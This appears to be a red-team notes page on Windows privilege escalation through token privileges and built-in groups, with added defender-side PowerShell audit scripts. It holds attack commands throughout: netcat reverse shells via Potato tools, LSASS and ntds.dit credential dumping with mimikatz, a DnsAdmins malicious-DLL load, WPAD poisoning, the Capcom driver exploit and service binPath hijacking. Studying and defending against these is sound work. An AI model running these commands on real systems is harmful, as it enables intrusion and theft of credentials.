# Windows Privilege Escalation with Groups and Privileges

{% embed url="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory" %}

## [Full List](https://github.com/gtworek/Priv2Admin)

## nt authority\local service

With [FullPowers](https://github.com/itm4n/FullPowers)

{% code overflow="wrap" %}

```powershell
.\FullPowers.exe
whoami /priv
```

{% endcode %}

## SeImpersonate & SeAssignPrimaryToken

These privileges can be used to impersonate a privileged account such as SYSTEM.\
They are often found on service accounts such as those running web servers, SQL Server, etc.\
Named pipes are used for local and remote inter-process communication. You create a named pipe and coerce a privileged process into connecting to it; once it connects, SeImpersonatePrivilege lets you impersonate that account's token and perform operations in its security context.

See [Potatoes](https://jlajara.gitlab.io/Potatoes_Windows_Privesc).
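As an added defender-side example (not part of the original page), the following PowerShell lists which principals hold the token privileges discussed on this page, reading the user-rights area that `secedit.exe` exports from the local security policy. It assumes an elevated prompt; the `Review` column flags holders outside the default system principals.

```powershell
# Added example (not from the original page): list which principals hold the
# token privileges covered on this page, from the user-rights area of the local
# security policy that secedit.exe exports. Run from an elevated prompt.
function Get-DangerousPrivilegeHolders {
    param(
        [string[]]$Privileges = @(
            'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
            'SeDebugPrivilege', 'SeTakeOwnershipPrivilege', 'SeBackupPrivilege',
            'SeRestorePrivilege', 'SeLoadDriverPrivilege'
        )
    )
    # Principals that hold some of these by default; anything else needs a look.
    $DefaultHolders = @('S-1-5-18', 'S-1-5-19', 'S-1-5-20', 'S-1-5-6', 'S-1-5-32-544')
    $cfg = Join-Path $env:TEMP 'secpol-user-rights.inf'
    secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    if (-not (Test-Path $cfg)) { throw 'secedit export failed; is the prompt elevated?' }
    try {
        foreach ($line in Get-Content $cfg) {
            # Export lines look like: SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-...-1105
            if ($line -notmatch '^(Se\w+Privilege)\s*=\s*(.*)$') { continue }
            $name, $holders = $Matches[1], $Matches[2]
            if ($Privileges -notcontains $name) { continue }
            foreach ($entry in $holders -split ',') {
                $sid = $entry.Trim().TrimStart('*')
                if (-not $sid) { continue }
                try {
                    $sidObj  = New-Object System.Security.Principal.SecurityIdentifier $sid
                    $account = $sidObj.Translate([System.Security.Principal.NTAccount]).Value
                } catch { $account = $sid }   # unresolvable SID, or already a name
                [pscustomobject]@{
                    Privilege = $name
                    Holder    = $account
                    Review    = ($sid -notin $DefaultHolders)
                }
            }
        }
    } finally { Remove-Item $cfg -ErrorAction SilentlyContinue }
}

Get-DangerousPrivilegeHolders | Sort-Object Privilege, Holder | Format-Table -AutoSize
```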

### [SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)

{% code overflow="wrap" %}

```powershell
.\SigmaPotato.exe "<COMMAND>"
.\SigmaPotato.exe --revshell <IP> <PORT>
```

{% endcode %}

### [GodPotato](https://github.com/BeichenDream/GodPotato)

{% code overflow="wrap" %}

```powershell
.\GodPotato.exe -cmd "<COMMAND>"
```

{% endcode %}

### [RasmanPotato](https://github.com/crisprss/RasmanPotato)

{% code overflow="wrap" %}

```powershell
.\RasMan.exe -c "<COMMAND>" -i [1/2]
```

{% endcode %}

### [JuicyPotato](https://github.com/ohpe/juicy-potato)

{% code overflow="wrap" %}

```powershell
JuicyPotato.exe -l <PORT> -p <PROGRAM> -a <ARG> -t * [-c <{clsid}>]
```

{% endcode %}

**!!** Set `-c <{clsid}>` if necessary.

{% code overflow="wrap" %}

```powershell
JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe <IP> <PORT> -e cmd.exe" -t *
```

{% endcode %}

### [PrintSpoofer](https://github.com/itm4n/PrintSpoofer)

For Windows 10 and Server 2016/2019.

{% code overflow="wrap" %}

```powershell
PrintSpoofer.exe -i -c powershell.exe
```

{% endcode %}

Example:

{% code overflow="wrap" %}

```powershell
PrintSpoofer.exe -c "c:\tools\nc.exe <IP> <PORT> -e cmd"
```

{% endcode %}

### [Metasploit](/rednote/utility/c2-and-exploitation-framework/metasploit.md)

In meterpreter session

{% code overflow="wrap" %}

```bash
load incognito
list_tokens -u  # to see token list
impersonate_token "<GetFromDelegationToken>"
```

{% endcode %}

## SeDebug

This privilege can be used to acquire sensitive information from system memory or elevate our privileges to SYSTEM.

### Dump lsass

```
Task Manager > right click LSAProcess > Create dump file
```

or with [procdump.exe](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump)

{% code overflow="wrap" %}

```powershell
procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

{% endcode %}

Then extract hashes with [mimikatz](https://github.com/gentilkiwi/mimikatz) or [pypykatz](https://github.com/skelsec/pypykatz)

{% code overflow="wrap" %}

```powershell
mimikatz.exe
> sekurlsa::minidump lsass.dmp
> sekurlsa::logonpasswords
```

{% endcode %}
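As an added example (not from the original page), this PowerShell reports whether the two mitigations that defeat the LSASS dump described above are active on the host: LSA Protection (the `RunAsPPL` value) and Credential Guard (via the `Win32_DeviceGuard` CIM class).

```powershell
# Added example (not from the original page): report whether the two mitigations
# that defeat an LSASS dump are active on this host. LSA Protection (RunAsPPL)
# denies the PROCESS_VM_READ handle procdump and Task Manager need; Credential
# Guard keeps the hashes out of lsass.exe memory altogether.
function Test-LsassProtection {
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
        -ErrorAction SilentlyContinue
    # RunAsPPL: 1 = enabled, 2 = enabled with UEFI lock; missing or 0 = off.
    $runAsPpl = ([int]$lsa.RunAsPPL) -ge 1
    $credGuard = $false
    try {
        $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
            -ClassName Win32_DeviceGuard -ErrorAction Stop
        # SecurityServicesRunning contains 1 when Credential Guard is running.
        $credGuard = [bool]($dg.SecurityServicesRunning -contains 1)
    } catch {
        # Class is absent on hosts without virtualization-based security support.
    }
    [pscustomobject]@{
        Host                     = $env:COMPUTERNAME
        LsaProtectionEnabled     = $runAsPpl
        CredentialGuardRunning   = $credGuard
        CredentialsExposedToDump = -not ($runAsPpl -or $credGuard)
    }
}

Test-LsassProtection
```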

### Privileged Shell

With [psgetsystem](https://github.com/decoder-it/psgetsystem)

{% code overflow="wrap" %}

```powershell
tasklist # take PID of winlogon.exe for example
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
. .\psgetsys.ps1
ImpersonateFromParentPid -ppid <PPID> -command <COMMAND> -cmdargs <ARGS>
```

{% endcode %}

## SeTakeOwnership

With this privilege, a user could take ownership of any file or object and make changes that could result in access to sensitive data, RCE, or DoS.

{% code overflow="wrap" %}

```powershell
takeown /f '<PATH_FILE>'
icacls <PATH_FILE> /grant <USER>:f
```

{% endcode %}

## SeBackupPrivilege ([Backup Operators](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#backup-operators))

The SeBackupPrivilege allows us to traverse any folder and list the folder contents. This will let us copy a file from a folder, even if there is no access control entry (ACE) for us in the folder's access control list (ACL). However, we can't do this using the standard copy command. Instead, we need to programmatically copy the data, making sure to specify the [FILE\_FLAG\_BACKUP\_SEMANTICS](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) flag.

```powershell
reg save hklm\system system
reg save hklm\sam sam
```

## SeRestorePrivilege

{% code overflow="wrap" %}

```powershell
cd C:\Windows\system32
ren Utilman.exe Utilman.old
ren cmd.exe Utilman.exe
```

{% endcode %}

{% code overflow="wrap" %}

```bash
rdesktop -u random -p random $target
```

{% endcode %}

When we're on the RDP login panel, press `WIN+U`.

An alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.

### Read Sensitive Data

With [SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege/tree/master)

{% code overflow="wrap" %}

```powershell
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Copy-FileSeBackupPrivilege <SOURCE> <DESTINATION>
cat <DESTINATION> 
```

{% endcode %}

### Get ntds.dit from DC

Shadow copy of the drive with [diskshadow.exe](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow)

{% code overflow="wrap" %}

```powershell
diskshadow.exe 
> set verbose on 
> set metadata C:\Windows\Temp\meta.cab 
> set context clientaccessible 
> set context persistent 
> begin backup 
> add volume C: alias cdrive 
> create 
> expose %cdrive% E: 
> end backup 
> exit
```

{% endcode %}

Now we copy the ntds.dit file from drive E:, which, unlike the one on C:, is not locked by another process and is therefore readable.

{% code overflow="wrap" %}

```powershell
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\ntds.dit
```

{% endcode %}

Or with [robocopy](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy)

{% code overflow="wrap" %}

```powershell
robocopy /B E:\Windows\NTDS .\ntds ntds.dit
```

{% endcode %}

## [Event Log Readers](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#event-log-readers)

Many Windows commands accept a password as a parameter, and if process command line auditing is enabled (event ID 4688), this sensitive information is captured in the Security log. Members of the Event Log Readers group can query Windows events from the command line with the [wevtutil](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil) utility or the PowerShell Get-WinEvent cmdlet, looking for this sensitive information.

In PowerShell

{% code overflow="wrap" %}

```powershell
wevtutil qe Security /rd:true /f:text | Select-String "/user"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
wevtutil qe Security /rd:true /f:text /r:<REMOTE_PC> /u:<USER> /p:<PASS> | Select-String "/user"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } | ForEach-Object { $_.Properties[8].Value }
```

{% endcode %}
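As an added defender-side example (not part of the original page), this PowerShell runs the same 4688 hunt but reports the offending process and account with the secret redacted, so the exposure can be fixed before anyone in Event Log Readers finds it. The regex list and the sample command lines at the end are constructed for the example.

```powershell
# Added example (not from the original page): scan Security event 4688 for
# command lines that carry a password, so the exposure can be fixed before an
# Event Log Reader finds it. Secrets are redacted in the report; constructed
# sample command lines at the end let the redaction be tried without a log.
$CredentialPatterns = @(
    '(?i)(/user:\S+\s+)(\S+)',         # net use \\srv\share /user:DOM\alice <pw>
    '(?i)(/p(?:ass)?:)(\S+)',          # wevtutil ... /u:DOM\user /p:<pw>
    '(?i)(\s-(?:p|password)\s+)(\S+)', # sqlcmd -U sa -P <pw>
    '(?i)(password=)([^;\s]+)'         # connection strings
)

function Find-CredentialInCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($p in $CredentialPatterns) {
        if ($CommandLine -match $p) {
            # Keep the flag, replace only the secret itself (the next token may be
            # redacted too when /user: is given without a password).
            return ($CommandLine -replace $p, '$1<REDACTED>')
        }
    }
    return $null
}

function Get-ExposedCredentialEvents {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Properties[8] is the command line (as in the query above); [1] is
            # the account that created the process.
            $redacted = Find-CredentialInCommandLine -CommandLine ([string]$_.Properties[8].Value)
            if ($redacted) {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    Account     = $_.Properties[1].Value
                    CommandLine = $redacted
                }
            }
        }
}

# Constructed sample command lines (not real credentials).
@(
    'net use \\fileserver\share /user:CORP\alice Summer2024!',
    'wevtutil qe Security /r:dc01 /u:CORP\svc_log /p:Winter2024 /f:text',
    'notepad.exe C:\Temp\notes.txt'
) | ForEach-Object { Find-CredentialInCommandLine -CommandLine $_ }
```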

## [DnsAdmins](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#dnsadmins)

The DNS service runs with SYSTEM privileges. If you are a member of the DnsAdmins group you can use the [dnscmd](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd) utility to load a custom DLL with zero verification. When the DNS service is restarted, the DLL is executed. The following attack can be executed when DNS runs on a Domain Controller (which is very common).

### DLL Attack

#### Create DLL

{% code overflow="wrap" %}

```powershell
msfvenom -p windows/x64/exec cmd='<COMMAND>' -f dll -o <NAME>.dll
```

{% endcode %}

Or enter `system("<COMMAND>");` under `fclose` in [kdns.c](https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c) and compile the project to get the modified **mimilib.dll**. The payload is executed for each query to the DNS service, and all DNS queries are logged to C:\Windows\system32\kiwidns.log

#### Load DLL

{% code overflow="wrap" %}

```powershell
# Locally
dnscmd.exe /config /serverlevelplugindll <FULL_PATH_TO_DLL>
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
# Remotely
dnscmd.exe <DNS_SERVER> /config /serverlevelplugindll \\<MY_COMPUTER/IP>\<FULL_PATH_TO_DLL>
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
# check
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
```

{% endcode %}

#### Restart DNS

Or wait for a reboot if you don't have permission to restart the service.

{% code overflow="wrap" %}

```powershell
# Locally 
sc.exe stop dns
sc.exe start dns
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
# Remotely
sc.exe \\<DNS_SERVER> stop dns
sc.exe \\<DNS_SERVER> start dns
```

{% endcode %}

#### Cleaning Up

These steps must be run from an elevated console with a local or domain admin account.\
Until the custom DLL is removed, the DNS service will not start properly again.

{% code overflow="wrap" %}

```powershell
# Check
reg query \\<IP>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
# Remove
reg delete \\<IP>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
# Restart
sc.exe start dns 
sc.exe query dns # check if state is running
```

{% endcode %}

### WPAD Attack

We need to disable the global query block list and create a WPAD record. Every machine running WPAD with default settings will then have its traffic proxied through our attack machine. We could use a tool such as [Responder](https://github.com/lgandx/Responder) or [Inveigh](https://github.com/Kevin-Robertson/Inveigh) to perform traffic spoofing, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.

{% code overflow="wrap" %}

```powershell
# Disabling the Global Query Block List 
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
# Adding a WPAD Record
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3
```

{% endcode %}
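As an added defender-side example (not part of the original page), this PowerShell audits a DNS server for both DnsAdmins abuses in this section: a `ServerLevelPluginDll` entry, and a disabled or stripped global query block list plus a rogue `wpad` record. It assumes the DnsServer RSAT module and reuses the server and zone names from the page above as placeholders.

```powershell
# Added example (not from the original page): audit a DNS server for the two
# DnsAdmins abuses above, a ServerLevelPluginDll entry and a tampered global
# query block list / rogue wpad record. Assumes the DnsServer RSAT module;
# the server and zone names are placeholders taken from this page.
function Test-DnsServerHardening {
    param(
        [string]$DnsServer = 'dc01.inlanefreight.local',
        [string]$ZoneName  = 'inlanefreight.local'
    )
    $findings = @()
    # 1. ServerLevelPluginDll is empty on a default install; any value is suspect.
    $params = Invoke-Command -ComputerName $DnsServer -ScriptBlock {
        Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' -ErrorAction SilentlyContinue
    }
    if ($params.ServerLevelPluginDll) {
        $dll = $params.ServerLevelPluginDll
        $findings += "ServerLevelPluginDll is set to '$dll'"
        if ($dll -like '\\*') { $findings += 'plugin DLL is loaded from a UNC path (another host)' }
    }
    # 2. The global query block list must stay enabled and keep wpad and isatap.
    $gqbl = Get-DnsServerGlobalQueryBlockList -ComputerName $DnsServer
    if (-not $gqbl.Enable) { $findings += 'GlobalQueryBlockList is disabled' }
    foreach ($n in 'wpad', 'isatap') {
        if ($gqbl.List -notcontains $n) { $findings += "'$n' is missing from GlobalQueryBlockList" }
    }
    # 3. A wpad A record sends every auto-proxy client to whatever host it names.
    $wpad = Get-DnsServerResourceRecord -ComputerName $DnsServer -ZoneName $ZoneName `
        -Name 'wpad' -RRType A -ErrorAction SilentlyContinue
    foreach ($rr in $wpad) {
        $findings += "wpad A record points at $($rr.RecordData.IPv4Address)"
    }
    [pscustomobject]@{
        Server   = $DnsServer
        Hardened = ($findings.Count -eq 0)
        Findings = $findings
    }
}

Test-DnsServerHardening | Format-List
```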

## [Print Operators](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#print-operators)

Grants its members the `SeLoadDriverPrivilege`.\
If we issue the command `whoami /priv`, and don't see the `SeLoadDriverPrivilege` from an unelevated context, we will need to bypass UAC. Alternatively, from a GUI, we can open an administrative command shell.

Download the [Capcom.sys](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys) driver.\
Use [EoPLoadDriver](https://github.com/TarlogicSecurity/EoPLoadDriver/) to automate the process of enabling the privilege, creating the registry key, and executing `NTLoadDriver` to load the driver.

{% code overflow="wrap" %}

```powershell
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\<PATH>\Capcom.sys
```

{% endcode %}

Use [ExploitCapcom](https://github.com/tandasat/ExploitCapcom) to exploit Capcom.sys

{% code overflow="wrap" %}

```powershell
.\ExploitCapcom.exe
```

{% endcode %}

*If we do not have GUI access to the target, we will have to modify the `ExploitCapcom.cpp` code before compiling, line 292, with* [*msfvenom*](/rednote/pentesting-process/software-attacks/shellcode.md#msfvenom) *payload.*

**Note**: Since Windows 10 Version 1803, the "`SeLoadDriverPrivilege`" is not exploitable, as it is no longer possible to include references to registry keys under "`HKEY_CURRENT_USER`".

## [Server Operators](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#server-operators)

The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a highly privileged group that can log in locally to servers, including Domain Controllers. Membership of this group confers the powerful `SeBackupPrivilege` and `SeRestorePrivilege` privileges and the ability to control local services.

#### Querying Service

{% code overflow="wrap" %}

```powershell
sc.exe qc AppReadiness
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
sc.exe qc VMTools
```

{% endcode %}

#### Modifying the Service Binary Path

{% code overflow="wrap" %}

```powershell
sc.exe config AppReadiness binPath= "cmd /c <COMMAND>"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
sc.exe config VMTools binPath= "cmd /c <COMMAND>"
```

{% endcode %}

#### Start the service

{% code overflow="wrap" %}

```powershell
sc.exe stop AppReadiness
sc.exe start AppReadiness
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
sc.exe stop VMTools
sc.exe start VMTools
```

{% endcode %}

The service startup fails, as expected, but the command will be executed correctly.
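As an added defender-side example (not part of the original page), this PowerShell finds services whose security descriptor lets a non-administrator trustee change the binary path or rewrite the ACL, which is exactly what the `sc.exe config` step above depends on. It parses the SDDL that `sc.exe sdshow` prints; the sample descriptor at the end is constructed so the parser can be tried without touching the SCM.

```powershell
# Added example (not from the original page): find services whose security
# descriptor lets a non-administrator principal change the binary path or
# rewrite the ACL, which is what the sc.exe config step above relies on.
# Parses the SDDL that `sc.exe sdshow` prints; a constructed descriptor is
# included so the parser can be exercised without touching the SCM.
$RightsOfConcern = @{
    'DC' = 'SERVICE_CHANGE_CONFIG'   # sc.exe config ... binPath=
    'WD' = 'WRITE_DAC'               # can grant itself anything
    'WO' = 'WRITE_OWNER'
    'GA' = 'GENERIC_ALL'
}
# SDDL trustee aliases expected to hold these rights: LocalSystem, BUILTIN\Administrators.
$TrustedAliases = @('SY', 'BA')

function Get-OverPermissiveServiceAces {
    param([Parameter(Mandatory)][string]$Sddl, [string]$ServiceName = '')
    # ACE layout: (type;flags;rights;object_guid;inherit_guid;trustee)
    $aceRegex = '\(([^;]*);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)'
    foreach ($m in [regex]::Matches($Sddl, $aceRegex)) {
        $type, $rights, $trustee = $m.Groups[1].Value, $m.Groups[3].Value, $m.Groups[4].Value
        if ($type -ne 'A' -or $trustee -in $TrustedAliases) { continue }
        # Rights are two-letter tokens (a hex mask, if present, is skipped here).
        $hits = [regex]::Matches($rights, '[A-Z]{2}') | ForEach-Object { $_.Value } |
                Where-Object { $RightsOfConcern.ContainsKey($_) }
        if ($hits) {
            [pscustomobject]@{
                Service = $ServiceName
                Trustee = $trustee   # SDDL alias or SID, e.g. SO = BUILTIN\Server Operators
                Rights  = (@($hits) | ForEach-Object { $RightsOfConcern[$_] }) -join ','
            }
        }
    }
}

function Get-ServiceConfigExposure {
    foreach ($svc in Get-Service) {
        $sddl = (sc.exe sdshow $svc.Name | ForEach-Object { $_.Trim() } | Where-Object { $_ -match '^D:' }) -join ''
        if ($sddl) { Get-OverPermissiveServiceAces -Sddl $sddl -ServiceName $svc.Name }
    }
}

# Constructed sample: default-looking ACEs plus one that grants Server Operators
# (SO) change-config and start/stop rights on the service.
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
          '(A;;CCLCSWLOCRRC;;;IU)(A;;CCDCLCSWRPWPLOCRRC;;;SO)'
Get-OverPermissiveServiceAces -Sddl $sample -ServiceName 'AppReadiness'
```

Run `Get-ServiceConfigExposure` on a live host to walk every installed service; the sample call reports the `SO` ACE with `SERVICE_CHANGE_CONFIG`.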

